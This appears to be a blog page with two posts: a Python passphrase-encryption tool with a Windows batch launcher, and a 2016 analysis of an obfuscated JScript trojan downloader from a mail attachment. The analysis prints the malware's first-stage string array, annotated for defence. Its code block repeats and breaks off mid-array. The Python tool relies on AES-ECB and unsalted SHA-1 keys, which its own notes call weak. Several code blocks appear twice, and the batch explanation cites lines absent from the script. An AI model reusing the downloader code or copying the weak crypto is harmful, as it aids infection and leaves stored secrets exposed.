
8 Nov 2024

Run a Python code by clicking (Windows)

I will write a Python program to encrypt sensitive information in a file. For each record the program collects a passphrase from the user and derives the encryption key from it; to retrieve the encrypted information later, the user must supply the same passphrase.

Python Code

secureStore.py

  
import os
import sys
 
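try:
    from Crypto.Cipher import AES
except ModuleNotFoundError:
    # The companion secureStore.bat greps stdout for this exact text to
    # decide whether to install the dependency, so keep the wording stable.
    # The original had an `exit()` after `raise`, which could never run.
    print("pip3 install pycryptodome")
    raise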
 
from Crypto.Util.Padding import pad, unpad
from Crypto.Hash import SHA1
 
 
###  AES-128 Encrpytion and Decryption   ###
############################################
def encrypt(raw_bytes, key):
    """Encrypt *raw_bytes* with AES-ECB after PKCS#7 padding.

    Args:
        raw_bytes: Plaintext as bytes (the callers pass ASCII-encoded text).
        key: AES key of 16, 24 or 32 bytes; create_key() provides 16 (AES-128).

    Returns:
        Ciphertext bytes whose length is a multiple of AES.block_size.

    NOTE(review): ECB is deterministic and carries no integrity check -
    identical plaintext blocks give identical ciphertext blocks, and a
    modified ciphertext is not detected (a wrong key or tampering only shows
    up as a padding error in decrypt(), and not always). An AEAD mode such as
    AES-GCM with a fresh nonce per record would be the fix; it is flagged
    rather than changed here because it alters the stored record format.
    """
    block_cipher = AES.new(key, AES.MODE_ECB)
    padded_plaintext = pad(raw_bytes, AES.block_size)
    return block_cipher.encrypt(padded_plaintext)
  
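def decrypt(ciphertext, key):
    """Decrypt *ciphertext* produced by encrypt() and strip the PKCS#7 padding.

    Args:
        ciphertext: Bytes whose length is a multiple of AES.block_size.
        key: The same 16/24/32-byte AES key that was used for encryption.

    Returns:
        The plaintext bytes.

    Raises:
        ValueError: if the ciphertext length is not a block multiple or the
            padding is malformed. With ECB a wrong key usually surfaces here
            as a padding error, which is why the caller treats it as a wrong
            passphrase.
    """
    block_cipher = AES.new(key, AES.MODE_ECB)
    try:
        padded = block_cipher.decrypt(ciphertext)
        return unpad(padded, AES.block_size)
    except ValueError as ve:
        # The original re-raised through an undefined name (`e.message`),
        # which turned a padding error into a NameError. Re-raise as a plain
        # ValueError carrying the library's message and the original cause.
        raise ValueError(str(ve)) from ve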
 
 
###               Main                   ###
############################################
 
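def create_key(txt):
    """Derive a 16-byte AES-128 key from the user's passphrase.

    Args:
        txt: The passphrase; surrounding whitespace is ignored and the text
            must be ASCII-encodable.

    Returns:
        The first 16 bytes of SHA-1(txt.strip()). AES accepts 16, 24 or
        32-byte keys, so this selects AES-128.

    Raises:
        UnicodeEncodeError: if *txt* contains non-ASCII characters.

    NOTE(review): a single unsalted SHA-1 is not a password-based KDF. Two
    records protected by the same passphrase get the same key, and anyone
    holding the locker file can test candidate passphrases at raw hash
    speed. A salted, iterated KDF (PBKDF2/scrypt/Argon2) would be the fix,
    but it changes how every stored record must be decrypted, so it is
    flagged here rather than changed silently.
    """
    # `digest` rather than `hash`, which shadowed the builtin; the slice
    # also closes the bracket the original line was missing.
    digest = SHA1.new(txt.strip().encode('ASCII')).digest()
    return digest[:16]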
 
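def store(about, encinfo, fname='secured.lckr'):
    """Append one record to the locker file in the current working directory.

    Record layout, one per line and backtick-delimited:
        <rec>`about`encinfo`</rec>
    list_rec() splits each line on backticks and reads the label from field 1
    and the ciphertext from field 2, so a backtick or line break inside
    *about* would corrupt the locker and confuse every later listing.

    Args:
        about: Human-readable label shown by list_rec(); stored in clear text.
        encinfo: The hex-encoded ciphertext from encrypt(...).hex().
        fname: Locker file name, resolved relative to os.getcwd().

    Raises:
        ValueError: if *about* contains a backtick, CR or LF.

    NOTE(review): the file is created with the process's default permissions.
    On POSIX a secrets file should be created 0o600 (os.open with an explicit
    mode) so other local users cannot read the labels and ciphertexts.
    """
    if any(ch in about for ch in ('`', '\r', '\n')):
        raise ValueError("'about' must not contain backticks or line breaks")

    prefix = '<rec>'
    suffix = '</rec>'
    rec = f'\r\n{prefix}`{about}`{encinfo}`{suffix}'

    file_path = os.path.join(os.getcwd(), fname)

    # Append mode: existing records are never rewritten.
    with open(file_path, 'a') as locker:
        locker.write(rec)
    print("Saved")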
  
   
def read_from_locker(filename='secured.lckr'):
    """Return every line of the locker file as readlines() delivers them.

    Args:
        filename: Locker file name, resolved relative to os.getcwd().

    Returns:
        list[str] of lines; store() prefixes each record with a line break,
        so the first element is normally a blank line.

    When the file does not exist this prints 'No records' and terminates the
    program via exit(), so callers never receive an empty result from that
    path.
    """
    locker_path = os.path.join(os.getcwd(), filename)
    lines = ""
    try:
        with open(locker_path, 'r') as handle:
            lines = handle.readlines()
    except FileNotFoundError:
        print(f'No records')
        exit()
    return lines
         
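def list_rec():
    """Print a numbered list of stored record labels and return the parsed records.

    Reads the locker via read_from_locker() and keeps only well-formed lines:
    at least four backtick-separated fields, the first being '<rec>' and the
    fourth '</rec>' (surrounding whitespace tolerated). Malformed lines are
    skipped instead of raising, so one corrupted line cannot take the whole
    listing down.

    Returns:
        list[list[str]]: one entry per record as [prefix, about, encinfo,
        suffix, ...]; the index in this list is the serial number shown to
        the user.
    """
    prefix = '<rec>'
    suffix = '</rec>'
    records = []
    data_dump = read_from_locker()

    print("\nSl.", "\t", "About")

    for line in data_dump:
        if len(line) <= len(prefix) + len(suffix):
            continue
        words = line.split('`')
        # The original indexed words[3] unconditionally, which raised
        # IndexError for a '<rec>' line containing too few backticks.
        if (len(words) >= 4
                and words[0].lstrip() == prefix
                and words[3].rstrip() == suffix):
            records.append(words)
            print(len(records) - 1, "\t", words[1])
    return records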
 
 
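def get_sensitive_info(encrypted_info):
    """Prompt for the passphrase, decrypt one record and print the plaintext.

    Args:
        encrypted_info: Hex string of the ciphertext, as written by store().

    Behaviour:
        - A wrong passphrase normally shows up as a padding ValueError from
          decrypt(); its message is printed and nothing else is revealed.
        - Because ECB has no integrity check, a wrong key can occasionally
          unpad "successfully" to garbage; decoding that as ASCII raised an
          uncaught UnicodeDecodeError in the original. UnicodeDecodeError
          (and the UnicodeEncodeError a non-ASCII passphrase causes in
          create_key) are ValueError subclasses, so the single handler below
          now covers them.
        - EOF on either prompt exits the program, like the rest of the menu.
    """
    try:
        paraphrase = input('Enter the paraphrase to retrieve the sensitive info:')
    except EOFError:
        exit()

    try:
        key = create_key(paraphrase)
        # Hex string -> ciphertext bytes -> plaintext bytes -> text.
        encr_bytes = bytes.fromhex(encrypted_info)
        dcryptd_info = decrypt(encr_bytes, key).decode("ASCII")
    except ValueError as err:
        print(err)
    else:
        print(f'info = {dcryptd_info}')

    try:
        input("\n Press any key to exit")
    except EOFError:
        exit()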
  
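def select_rec():
    """List the records, ask for a serial number and show that record's secret.

    Input that is not an integer, or EOF on the prompt, exits the program
    (the advertised "any other key to Exit" path). An integer outside the
    listed range prints 'Invalid Sl.' and returns.
    """
    records = list_rec()
    print("Press any other key to Exit \n")
    try:
        rec_id = int(input('Select a Sl. to show sensitive info:'))
    except (ValueError, EOFError):
        # The original had `except Exception` followed by an unreachable
        # `except EOFError` (EOFError is an Exception subclass).
        exit()

    if 0 <= rec_id < len(records):
        # Field 2 of a record is the hex ciphertext written by store().
        get_sensitive_info(records[rec_id][2])
    else:
        print(f'Invalid Sl.')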
  
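def store_rec():
    """Prompt for a passphrase, a secret and a label, then append the encrypted record.

    The secret is encrypted with the key create_key() derives from the
    passphrase and handed to store() as hex. EOF on any prompt exits.

    Only ASCII is supported end to end (create_key and get_sensitive_info
    both use the ASCII codec), so non-ASCII input is rejected with a message
    instead of the UnicodeEncodeError traceback the original produced. An
    empty passphrase is refused because the resulting key is one anyone can
    derive.
    """
    try:
        paraphrase = input('Enter the paraphrase to encrypt the sensitive info:')
        senstv_info = input('Enter the sensitive info:').strip()
        about = input('Enter a name to identify:').strip()
    except EOFError:
        exit()

    if not paraphrase.strip():
        print('The paraphrase must not be empty')
        return

    try:
        key = create_key(paraphrase)
        senstv_info_bytes = senstv_info.encode('ASCII')
    except UnicodeEncodeError:
        print('Only ASCII characters are supported')
        return

    # hex() keeps the locker file plain text.
    encryptd_info = encrypt(senstv_info_bytes, key).hex()
    store(about, encryptd_info)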
 
 
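def main_menu():
    """Show the two-item menu and dispatch on the user's choice.

    '1' lists records and lets the user reveal one, '2' stores a new record,
    anything else (including EOF on the prompt) exits. input() always returns
    a str, so the original `menu_no == 1` comparisons could never be true and
    were dropped.
    """
    print("1. \t List Records")
    print("2. \t Store a Sensitive Info")
    print("Press any other key to Exit")

    try:
        menu_no = input('Select a menu number:')
        if menu_no == '1':
            select_rec()
        elif menu_no == '2':
            store_rec()
        else:
            exit()
    except EOFError:
        exit()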
 
 
##   Secure Store Main Menu
## ##########################
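if __name__ == "__main__":
    # Run the interactive menu only when executed as a script; importing the
    # module (e.g. to reuse encrypt()/decrypt()) must not prompt the user.
    main_menu()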
 

  
import os
import sys

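try:
    from Crypto.Cipher import AES
except ModuleNotFoundError:
    # The companion secureStore.bat greps stdout for this exact text to
    # decide whether to install the dependency, so keep the wording stable.
    # The original had an `exit()` after `raise`, which could never run.
    print("pip3 install pycryptodome")
    raise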

from Crypto.Util.Padding import pad, unpad
from Crypto.Hash import SHA1


###  AES-128 Encrpytion and Decryption   ###
############################################
def encrypt(raw_bytes, key):
    """Encrypt *raw_bytes* with AES-ECB after PKCS#7 padding.

    Args:
        raw_bytes: Plaintext as bytes (the callers pass ASCII-encoded text).
        key: AES key of 16, 24 or 32 bytes; create_key() provides 16 (AES-128).

    Returns:
        Ciphertext bytes whose length is a multiple of AES.block_size.

    NOTE(review): ECB is deterministic and carries no integrity check -
    identical plaintext blocks give identical ciphertext blocks, and a
    modified ciphertext is not detected (a wrong key or tampering only shows
    up as a padding error in decrypt(), and not always). An AEAD mode such as
    AES-GCM with a fresh nonce per record would be the fix; it is flagged
    rather than changed here because it alters the stored record format.
    """
    block_cipher = AES.new(key, AES.MODE_ECB)
    padded_plaintext = pad(raw_bytes, AES.block_size)
    return block_cipher.encrypt(padded_plaintext)
 
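def decrypt(ciphertext, key):
    """Decrypt *ciphertext* produced by encrypt() and strip the PKCS#7 padding.

    Args:
        ciphertext: Bytes whose length is a multiple of AES.block_size.
        key: The same 16/24/32-byte AES key that was used for encryption.

    Returns:
        The plaintext bytes.

    Raises:
        ValueError: if the ciphertext length is not a block multiple or the
            padding is malformed. With ECB a wrong key usually surfaces here
            as a padding error, which is why the caller treats it as a wrong
            passphrase.
    """
    block_cipher = AES.new(key, AES.MODE_ECB)
    try:
        padded = block_cipher.decrypt(ciphertext)
        return unpad(padded, AES.block_size)
    except ValueError as ve:
        # The original re-raised through an undefined name (`e.message`),
        # which turned a padding error into a NameError. Re-raise as a plain
        # ValueError carrying the library's message and the original cause.
        raise ValueError(str(ve)) from ve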


###               Main                   ###
############################################

def create_key(txt):
    """Derive a 16-byte AES-128 key from the user's passphrase.

    Args:
        txt: The passphrase; surrounding whitespace is ignored and the text
            must be ASCII-encodable.

    Returns:
        The first 16 bytes of SHA-1(txt.strip()). AES accepts 16, 24 or
        32-byte keys, so this selects AES-128.

    Raises:
        UnicodeEncodeError: if *txt* contains non-ASCII characters.

    NOTE(review): a single unsalted SHA-1 is not a password-based KDF. Two
    records protected by the same passphrase get the same key, and anyone
    holding the locker file can test candidate passphrases at raw hash
    speed. A salted, iterated KDF (PBKDF2/scrypt/Argon2) would be the fix,
    but it changes how every stored record must be decrypted, so it is
    flagged here rather than changed silently.
    """
    # Named `digest` rather than `hash` to avoid shadowing the builtin.
    digest = SHA1.new(txt.strip().encode('ASCII')).digest()
    return digest[:16]

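def store(about, encinfo, fname='secured.lckr'):
    """Append one record to the locker file in the current working directory.

    Record layout, one per line and backtick-delimited:
        <rec>`about`encinfo`</rec>
    list_rec() splits each line on backticks and reads the label from field 1
    and the ciphertext from field 2, so a backtick or line break inside
    *about* would corrupt the locker and confuse every later listing.

    Args:
        about: Human-readable label shown by list_rec(); stored in clear text.
        encinfo: The hex-encoded ciphertext from encrypt(...).hex().
        fname: Locker file name, resolved relative to os.getcwd().

    Raises:
        ValueError: if *about* contains a backtick, CR or LF.

    NOTE(review): the file is created with the process's default permissions.
    On POSIX a secrets file should be created 0o600 (os.open with an explicit
    mode) so other local users cannot read the labels and ciphertexts.
    """
    if any(ch in about for ch in ('`', '\r', '\n')):
        raise ValueError("'about' must not contain backticks or line breaks")

    prefix = '<rec>'
    suffix = '</rec>'
    rec = f'\r\n{prefix}`{about}`{encinfo}`{suffix}'

    file_path = os.path.join(os.getcwd(), fname)

    # Append mode: existing records are never rewritten.
    with open(file_path, 'a') as locker:
        locker.write(rec)
    print("Saved")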
 
  
def read_from_locker(filename='secured.lckr'):
    """Return every line of the locker file as readlines() delivers them.

    Args:
        filename: Locker file name, resolved relative to os.getcwd().

    Returns:
        list[str] of lines; store() prefixes each record with a line break,
        so the first element is normally a blank line.

    When the file does not exist this prints 'No records' and terminates the
    program via exit(), so callers never receive an empty result from that
    path.
    """
    locker_path = os.path.join(os.getcwd(), filename)
    lines = ""
    try:
        with open(locker_path, 'r') as handle:
            lines = handle.readlines()
    except FileNotFoundError:
        print(f'No records')
        exit()
    return lines
        
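def list_rec():
    """Print a numbered list of stored record labels and return the parsed records.

    Reads the locker via read_from_locker() and keeps only well-formed lines:
    at least four backtick-separated fields, the first being '<rec>' and the
    fourth '</rec>' (surrounding whitespace tolerated). Malformed lines are
    skipped instead of raising, so one corrupted line cannot take the whole
    listing down.

    Returns:
        list[list[str]]: one entry per record as [prefix, about, encinfo,
        suffix, ...]; the index in this list is the serial number shown to
        the user.
    """
    prefix = '<rec>'
    suffix = '</rec>'
    records = []
    data_dump = read_from_locker()

    print("\nSl.", "\t", "About")

    for line in data_dump:
        if len(line) <= len(prefix) + len(suffix):
            continue
        words = line.split('`')
        # The original indexed words[3] unconditionally, which raised
        # IndexError for a '<rec>' line containing too few backticks.
        if (len(words) >= 4
                and words[0].lstrip() == prefix
                and words[3].rstrip() == suffix):
            records.append(words)
            print(len(records) - 1, "\t", words[1])
    return records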


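def get_sensitive_info(encrypted_info):
    """Prompt for the passphrase, decrypt one record and print the plaintext.

    Args:
        encrypted_info: Hex string of the ciphertext, as written by store().

    Behaviour:
        - A wrong passphrase normally shows up as a padding ValueError from
          decrypt(); its message is printed and nothing else is revealed.
        - Because ECB has no integrity check, a wrong key can occasionally
          unpad "successfully" to garbage; decoding that as ASCII raised an
          uncaught UnicodeDecodeError in the original. UnicodeDecodeError
          (and the UnicodeEncodeError a non-ASCII passphrase causes in
          create_key) are ValueError subclasses, so the single handler below
          now covers them.
        - EOF on either prompt exits the program, like the rest of the menu.
    """
    try:
        paraphrase = input('Enter the paraphrase to retrieve the sensitive info:')
    except EOFError:
        exit()

    try:
        key = create_key(paraphrase)
        # Hex string -> ciphertext bytes -> plaintext bytes -> text.
        encr_bytes = bytes.fromhex(encrypted_info)
        dcryptd_info = decrypt(encr_bytes, key).decode("ASCII")
    except ValueError as err:
        print(err)
    else:
        print(f'info = {dcryptd_info}')

    try:
        input("\n Press any key to exit")
    except EOFError:
        exit()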
 
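def select_rec():
    """List the records, ask for a serial number and show that record's secret.

    Input that is not an integer, or EOF on the prompt, exits the program
    (the advertised "any other key to Exit" path). An integer outside the
    listed range prints 'Invalid Sl.' and returns.
    """
    records = list_rec()
    print("Press any other key to Exit \n")
    try:
        rec_id = int(input('Select a Sl. to show sensitive info:'))
    except (ValueError, EOFError):
        # The original had `except Exception` followed by an unreachable
        # `except EOFError` (EOFError is an Exception subclass).
        exit()

    if 0 <= rec_id < len(records):
        # Field 2 of a record is the hex ciphertext written by store().
        get_sensitive_info(records[rec_id][2])
    else:
        print(f'Invalid Sl.')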
 
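def store_rec():
    """Prompt for a passphrase, a secret and a label, then append the encrypted record.

    The secret is encrypted with the key create_key() derives from the
    passphrase and handed to store() as hex. EOF on any prompt exits.

    Only ASCII is supported end to end (create_key and get_sensitive_info
    both use the ASCII codec), so non-ASCII input is rejected with a message
    instead of the UnicodeEncodeError traceback the original produced. An
    empty passphrase is refused because the resulting key is one anyone can
    derive.
    """
    try:
        paraphrase = input('Enter the paraphrase to encrypt the sensitive info:')
        senstv_info = input('Enter the sensitive info:').strip()
        about = input('Enter a name to identify:').strip()
    except EOFError:
        exit()

    if not paraphrase.strip():
        print('The paraphrase must not be empty')
        return

    try:
        key = create_key(paraphrase)
        senstv_info_bytes = senstv_info.encode('ASCII')
    except UnicodeEncodeError:
        print('Only ASCII characters are supported')
        return

    # hex() keeps the locker file plain text.
    encryptd_info = encrypt(senstv_info_bytes, key).hex()
    store(about, encryptd_info)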


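def main_menu():
    """Show the two-item menu and dispatch on the user's choice.

    '1' lists records and lets the user reveal one, '2' stores a new record,
    anything else (including EOF on the prompt) exits. input() always returns
    a str, so the original `menu_no == 1` comparisons could never be true and
    were dropped.
    """
    print("1. \t List Records")
    print("2. \t Store a Sensitive Info")
    print("Press any other key to Exit")

    try:
        menu_no = input('Select a menu number:')
        if menu_no == '1':
            select_rec()
        elif menu_no == '2':
            store_rec()
        else:
            exit()
    except EOFError:
        exit()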


##   Secure Store Main Menu
## ##########################
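if __name__ == "__main__":
    # Run the interactive menu only when executed as a script; importing the
    # module (e.g. to reuse encrypt()/decrypt()) must not prompt the user.
    main_menu()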


Execute the Python Code

To execute the above code, we must do the following steps
1. Open the Command Prompt
2. Change the directory to where this code exists.
3. Type 
python secureStore.py

This is inconvenient and requires knowing a few commands to navigate in the command prompt.

The easiest way would be to just double click on a file and boom our code is up and running.

Well to do that, we need to create a batch script.

Batch Script


secureStore.bat

  
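@ECHO OFF
REM One SETLOCAL carrying both options; the original opened two scopes
REM  but closed only one.
SETLOCAL ENABLEEXTENSIONS ENABLEDELAYEDEXPANSION
REM ENABLEDELAYEDEXPANSION lets !var! expand at execution time.
REM Percent-expansion happens when a whole line, or a whole parenthesised
REM  block, is parsed, so inside FOR and IF blocks a variable keeps the
REM  value it had before the block and counters appear not to change;
REM  the exclamation-mark form reads the live value instead.

REM Parent directory of the secureStore code, ending with a backslash.
REM The quoted SET form keeps trailing spaces out of the value.
SET "parent=%~dp0"
SET /A noninteractive=0
SET /A exitCode=0

REM Detect "double-click" execution from Windows Explorer: in that case
REM  CMDCMDLINE contains this script's file name, from an open console it
REM  does not. The /C: form copes with names containing spaces.
ECHO %CMDCMDLINE% | FINDSTR /L /I /C:"%~nx0" >NUL 2>&1
IF NOT ERRORLEVEL 1 SET /A noninteractive=1

REM  Locate python.exe. If more than one is on PATH, keep the first one.
REM  NOTE(review): this trusts PATH order. A python.exe placed in a
REM  user-writable directory that precedes the real installation would be
REM  the one launched; pin the interpreter path where that matters.
SET "pyPath="
FOR /F "usebackq delims=" %%i IN (`where python.exe 2^>NUL`) DO (
    IF NOT DEFINED pyPath SET "pyPath=%%i"
)
IF NOT DEFINED pyPath (
    ECHO python.exe was not found on PATH
    SET /A exitCode=1
    GOTO :finish
)

REM /D also switches drive; quotes protect paths containing spaces.
CD /D "%parent%"

REM Run the app
"%pyPath%" secureStore.py
SET /A exitCode=!ERRORLEVEL!

IF !exitCode! NEQ 0 (
 REM The app failed: re-run it and look for the exact hint secureStore.py
 REM  prints when pycryptodome is missing.
 "%pyPath%" secureStore.py 2>NUL | FINDSTR /LI "pip3 install pycryptodome"
 REM IF ERRORLEVEL 0 is always true because it tests for errorlevel at
 REM  least 0, so the original installed on every failure.
 REM  IF NOT ERRORLEVEL 1 is the test for exactly 0.
 IF NOT ERRORLEVEL 1 (
  REM Install into the same interpreter that runs the app, not whatever
  REM  pip3 happens to be first on PATH.
  REM NOTE(review): this downloads from the package index at run time;
  REM  pin a version, and ideally hashes, before relying on it.
  ECHO Installing Crypto Library
  "%pyPath%" -m pip install pycryptodome
  IF NOT ERRORLEVEL 1 (
    REM Dependency installed: run the app once more
    "%pyPath%" secureStore.py
    SET /A exitCode=!ERRORLEVEL!
  )
 )
)

:finish
IF !noninteractive! EQU 1 (
 REM Keep the console open so the output can be read when the script
 REM  was double-clicked from Windows Explorer
 PAUSE
)

REM The exit code is expanded before ENDLOCAL runs, so the value survives
REM  the end of the local scope.
ENDLOCAL & EXIT /B %exitCode%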
 

  
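@ECHO OFF
REM One SETLOCAL carrying both options; the original opened two scopes
REM  but closed only one.
SETLOCAL ENABLEEXTENSIONS ENABLEDELAYEDEXPANSION
REM ENABLEDELAYEDEXPANSION lets !var! expand at execution time.
REM Percent-expansion happens when a whole line, or a whole parenthesised
REM  block, is parsed, so inside FOR and IF blocks a variable keeps the
REM  value it had before the block and counters appear not to change;
REM  the exclamation-mark form reads the live value instead.

REM Parent directory of the secureStore code, ending with a backslash.
REM The quoted SET form keeps trailing spaces out of the value.
SET "parent=%~dp0"
SET /A noninteractive=0
SET /A exitCode=0

REM Detect "double-click" execution from Windows Explorer: in that case
REM  CMDCMDLINE contains this script's file name, from an open console it
REM  does not. The /C: form copes with names containing spaces.
ECHO %CMDCMDLINE% | FINDSTR /L /I /C:"%~nx0" >NUL 2>&1
IF NOT ERRORLEVEL 1 SET /A noninteractive=1

REM  Locate python.exe. If more than one is on PATH, keep the first one.
REM  NOTE(review): this trusts PATH order. A python.exe placed in a
REM  user-writable directory that precedes the real installation would be
REM  the one launched; pin the interpreter path where that matters.
SET "pyPath="
FOR /F "usebackq delims=" %%i IN (`where python.exe 2^>NUL`) DO (
    IF NOT DEFINED pyPath SET "pyPath=%%i"
)
IF NOT DEFINED pyPath (
    ECHO python.exe was not found on PATH
    SET /A exitCode=1
    GOTO :finish
)

REM /D also switches drive; quotes protect paths containing spaces.
CD /D "%parent%"

REM Run the app
"%pyPath%" secureStore.py
SET /A exitCode=!ERRORLEVEL!

IF !exitCode! NEQ 0 (
 REM The app failed: re-run it and look for the exact hint secureStore.py
 REM  prints when pycryptodome is missing.
 "%pyPath%" secureStore.py 2>NUL | FINDSTR /LI "pip3 install pycryptodome"
 REM IF ERRORLEVEL 0 is always true because it tests for errorlevel at
 REM  least 0, so the original installed on every failure.
 REM  IF NOT ERRORLEVEL 1 is the test for exactly 0.
 IF NOT ERRORLEVEL 1 (
  REM Install into the same interpreter that runs the app, not whatever
  REM  pip3 happens to be first on PATH.
  REM NOTE(review): this downloads from the package index at run time;
  REM  pin a version, and ideally hashes, before relying on it.
  ECHO Installing Crypto Library
  "%pyPath%" -m pip install pycryptodome
  IF NOT ERRORLEVEL 1 (
    REM Dependency installed: run the app once more
    "%pyPath%" secureStore.py
    SET /A exitCode=!ERRORLEVEL!
  )
 )
)

:finish
IF !noninteractive! EQU 1 (
 REM Keep the console open so the output can be read when the script
 REM  was double-clicked from Windows Explorer
 PAUSE
)

REM The exit code is expanded before ENDLOCAL runs, so the value survives
REM  the end of the local scope.
ENDLOCAL & EXIT /B %exitCode%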

Place this batch script in the same folder as python code. Also create a shortcut for this batch script in Desktop, Programs Menu, etc.

Double click the icon of secureStore.bat

Now when you double click on the secureStore.bat or its shortcut, it will execute the python code and show in command prompt.

Command prompt Output

Understanding the Batch Script

Line 1: @ECHO OFF : This instruction stops cmd.exe from displaying each batch command as it is executed. Without @ECHO OFF, the output would look like the image below

image of output without @echo off


Line 20: FOR /F "usebackq delims=" %%i IN (`where python.exe`) DO ( 

It parses the output of the command inside the IN () block and for each output line, the DO () block is executed. 

usebackq option specifies that  `backquoted text` is executed as command, 'single quoted text' as literal string and "double quoted text" as filenames.

delims= (an empty delimiter list) specifies that the output is not tokenised on any delimiter, so each output line is passed as a whole.

%%i is the variable which stores the output line for each output line iterated.

Line 21: IF /I !once! EQU 0 (

This instruction checks whether the once variable equals 0; if it does, the commands inside the ( ) block are run.

Line 32: ECHO %CMDCMDLINE% | FINDSTR /L /I %parent% >NUL 2>&1 

%CMDCMDLINE% is built-in variable that contains the path of the command which invoked the  cmd.exe. IF a batch script is executed from already running cmd.exe then  CMDCMDLINE value would be "C:\Windows\System32\cmd.exe" and  if the batch script was run by double-clicking on it, then CMDCMDLINE would be "C:\WINDOWS\system32\cmd.exe /c ""\projects\SecureStoreApp\secureStore.bat" ""

The '|' pipe operator passes the output of the LHS command as the input of the RHS command.

FINDSTR searches for the value of the parent variable in the CMDCMDLINE text; if it is not found, the built-in ERRORLEVEL variable is set to 1, otherwise ERRORLEVEL is set to 0 (success).

/I option makes the search case-insensitive.

/L option instructs to use the search string literally instead of as any regular expression string.

>NUL 2>&1 redirects the output of FINDSTR to the NUL device and also redirects STDERR to STDOUT (which is itself already redirected to NUL). So this line produces no visible output at all.

Lines 41-45: If running the Python code throws an error because a module is not found, FINDSTR is used to detect which module is missing and the required library is then installed.


4 Apr 2016

Learned JavaScript from a Trojan that arrived as a ZIP Mail Attachment


I received a mail in my company account that appeared to come from my own address. I was quite sure that I hadn't sent a mail to myself, so I checked the headers of the email, and they showed it came from an unknown source.


Now I was pretty convinced that this is a rogue email that may contain some kind of malicious code. The mail had an attachment containing  a file called “Image917524490855.zip”. 



I was curious to know what was inside and how it could infect my computer. After extracting the zip file, I found it contained a JS file. So now I wanted to know how a JavaScript file could infect my system with a virus.


Boy, I have to tell you: if you want to see inventive coding tricks and learn new things, go through the codebase of a virus.


I'm breaking the code down into small snippets to understand what is going on, and have commented inside the code on its meaning, the current variable values and any unfamiliar syntax.

To see the full codebase, please check the github page here


// Analyst notes (defensive): first stage of an obfuscated JScript downloader that
// arrived inside a ZIP mail attachment. Nothing here is exotic: the comma operator
// returns its LAST operand, so every ("noise", ..., "X") evaluates to "X", and the
// filler word "condo" is stripped later with split("condo").join(""). Evaluating
// the pieces by hand is enough to recover the real strings; no execution is needed.
thickI = 0;   // global counter, reused throughout as an index/offset into the array below
String.prototype.millinery = function() {
    aa = this;
    return aa.charAt(8 * 0 * 8); // 8*0*8 === 0, so this returns the first character of the string
};
// Evaluated values, by index: [0] "pSTFVYIrjX" (filler), [1] "oGyfvyWIHhQ" (filler),
// [2] "ExpandEnvironmentStrings", [3] "%TEMP%", [4] ".exe", [5] "Run",
// [6] "ActcondoivcondoeXcondoObcondojecondoct" -> "ActiveXObject" once "condo" is removed,
// [7] "nlHcwmmYdvD" (filler), [8] "HCpQSg" (filler), [9] "WSccondoriptcondo.S",
// [10] "LVEhhuKWtV" (filler), [11] "hcondoelcondol", [12] "BHyXGt" (filler),
// [13] "VmeVYVS" (filler), [14] "McondoSXcondoMLcondo2.condoXMcondoLHcondoTTP" -> "MSXML2.XMLHTTP".
// The filler entries exist only so that later splice() calls shift the real ones into place.
var BilRTKUok = [
    "p" + ("italy", "navel", "squatter", "ST") + "FV" + ("lassie", "monopolize", "neighborhood", "YI") + "rjX",
    "o" + "Gyfv" + "yW" + "IH" + ("crossroads", "hybrid", "stingy", "interlude", "hQ"),
    "E" + ("keyboard", "tandem", "gotten", "listen", "xp") + "an" + ("keith", "vestige", "input", "heinous", "dE") + "nv" + "ir" + ("septuagint", "bookkeeper", "greece", "scimitar", "on") + "me" + ("patio", "unleavened", "nt") + ("garnered", "adrift", "St") + ("performance", "yahoo", "ri") + ("voices", "mexico", "ngs"),
    "" + "%" + ("burdett", "tongs", "TE") + ("travail", "inserted", "MP%"),
    "" + "." + ("followed", "casting", "second", "exe"),
    ("including", "enemy", "R") + "un",
    ("chronology", "alexandra", "nightmare", "helicopter", "A") + "ct" + "co" + "ndoi" + "vc" + ("ranks", "homogeneous", "sudan", "decorate", "ondo") + "eX" + ("sediment", "forces", "preparation", "graphs", "cond") + "oO" + "bc" + ("revealed", "isolate", "malta", "macintosh", "on") + "do" + ("enhance", "install", "jecond") + "oct",
    "nlHcwmmYdvD",
    "HCpQSg",
    "W" + "Sc" + "co" + "nd" + "or" + "ip" + "tc" + ("commissioner", "papua", "spalding", "tasting", "on") + "do." + ("manslaughter", "fiftyfive", "workstation", "halter", "S"),
    "LVEhhuKWtV",
    ("convergence", "lamentation", "abstracts", "lynching", "hco") + "ndoe" + "lc" + "on" + ("playback", "quench", "doing", "ballet", "dol"),
    "BHyXGt",
    "V" + ("informer", "parrot", "redeem", "me") + "VY" + ("colin", "reprint", "tropical", "VS"),
    ("durable", "mention", "provisional", "shuttle", "McondoSXc") + ("naming", "facility", "on") + ("scamp", "privy", "doMLcond") + "o2" + ("ordinance", "distributed", "mediator", "delinquent", ".") + "co" + ("wellbred", "misshapen", "nd") + "oXMc" + "on" + ("unsaid", "leather", "jenny", "animus", "doLH") + ("pyramids", "contribution", "co") + ("extend", "suppliers", "treasury", "furniture", "nd") + "oTTP"
                 
                ];    // see img BilRTKUok-01.JPG: the array after all the string expressions have been evaluated
// Analyst notes (defensive): first stage of an obfuscated JScript downloader that
// arrived inside a ZIP mail attachment. Nothing here is exotic: the comma operator
// returns its LAST operand, so every ("noise", ..., "X") evaluates to "X", and the
// filler word "condo" is stripped later with split("condo").join(""). Evaluating
// the pieces by hand is enough to recover the real strings; no execution is needed.
thickI = 0;   // global counter, reused throughout as an index/offset into the array below
String.prototype.millinery = function() {
    aa = this;
    return aa.charAt(8 * 0 * 8); // 8*0*8 === 0, so this returns the first character of the string
};
// Evaluated values, by index: [0] "pSTFVYIrjX" (filler), [1] "oGyfvyWIHhQ" (filler),
// [2] "ExpandEnvironmentStrings", [3] "%TEMP%", [4] ".exe", [5] "Run",
// [6] "ActcondoivcondoeXcondoObcondojecondoct" -> "ActiveXObject" once "condo" is removed,
// [7] "nlHcwmmYdvD" (filler), [8] "HCpQSg" (filler), [9] "WSccondoriptcondo.S",
// [10] "LVEhhuKWtV" (filler), [11] "hcondoelcondol", [12] "BHyXGt" (filler),
// [13] "VmeVYVS" (filler), [14] "McondoSXcondoMLcondo2.condoXMcondoLHcondoTTP" -> "MSXML2.XMLHTTP".
// The filler entries exist only so that later splice() calls shift the real ones into place.
var BilRTKUok = [
    "p" + ("italy", "navel", "squatter", "ST") + "FV" + ("lassie", "monopolize", "neighborhood", "YI") + "rjX", 
    "o" + "Gyfv" + "yW" + "IH" + ("crossroads", "hybrid", "stingy", "interlude", "hQ"), 

